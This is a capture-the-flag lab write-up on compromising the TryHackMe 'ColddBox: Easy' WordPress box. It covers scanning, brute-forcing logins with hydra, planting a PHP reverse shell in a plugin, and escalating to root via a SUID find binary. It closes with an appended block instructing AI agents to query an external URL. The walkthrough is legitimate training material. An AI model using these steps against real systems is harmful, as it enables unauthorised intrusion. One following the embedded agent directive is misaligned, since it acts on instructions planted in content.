# ColddBox: Easy ![](/files/-MbxI9paakOr8vV4JYB6) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.70.76 ``` ![](/files/-MbxIlFuFLbvTrzlk7tR) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 80 -oN nmap 10.10.70.76 ``` ![](/files/-MbxIpH0PQPf8Rppguj5) ## **Enumeration** Lets visit the site ![](/files/-MbxJCImZIZzDvcRSGH1) Looks like a well made page, while looking through the website I found a login page. ![](/files/-MbxKY8E2dksr6yc8SIz) ![](/files/-MbxKSjlhemZn0OqDrdH) Also looking at the nmap scan, we know that `WordPress 4.1.31` is running, also there is a Wordpress scanner called `wpscan` , lets use it to find more information. ``` wpscan --url http://10.10.70.76/ -e vp,t,u ``` ![](/files/-MbxLB2sQEeNOVGAuQxn) Looking at the output, we find some interesting information ![](/files/-MbxPztXbsah5dhwSy6p) Lets use `hydra` to bruteforce and find atleast one password for one of the users. I saved the usernames in a file called `users`. ![](/files/-MbxQW7cRWCHCZIMZGEX) ## Exploitation Lets now use hydra to crack the password ``` hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' ``` ![](/files/-MbxRd1AKOj06GW3JF1M) And we get the password, lets login ![](/files/-MbxRvR-YnwREgB653aY) We are logged in. For getting a reverse shell on the machine we have to add a reverse shell that you can find [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). First lets go to the `Plugins` tab and then replace one of the plugins with the php reverse shell, also make sure to change the IP to yours. ![](/files/-MbxXjVYx1G17laRR35S) After changing it, click update file and start a netcat listener. ![](/files/-MbxTTgVtRMsD0yo-xei) Then navigate to the page. ``` http://10.10.58.100/wp-content/plugins/akismet/akismet.php ``` ![](/files/-Mbx_XNnj8jmj3FkePkd) You should get a reverse shell. Lets stabilize the shell. ![](/files/-Mbxa3mf-Im15CUXylyo) ## Privilege Escalation Lets look for `SUIDs` that we can exploit. ``` find / -perm -u=s -type f 2>/dev/null ``` ![](/files/-Mbxbaynynf8_na7-lFw) We have `/usr/bin/find`, lets go to `GTFOBins` and find the command to privilege escalate. ![](/files/-Mbxbs8Eh1J1N_kVOpQV) Lets use the second command ``` find . -exec /bin/sh -p \; -quit ``` ![](/files/-Mbxc4GCKoHCbO2Z_86O) We are now root. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/colddbox-easy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.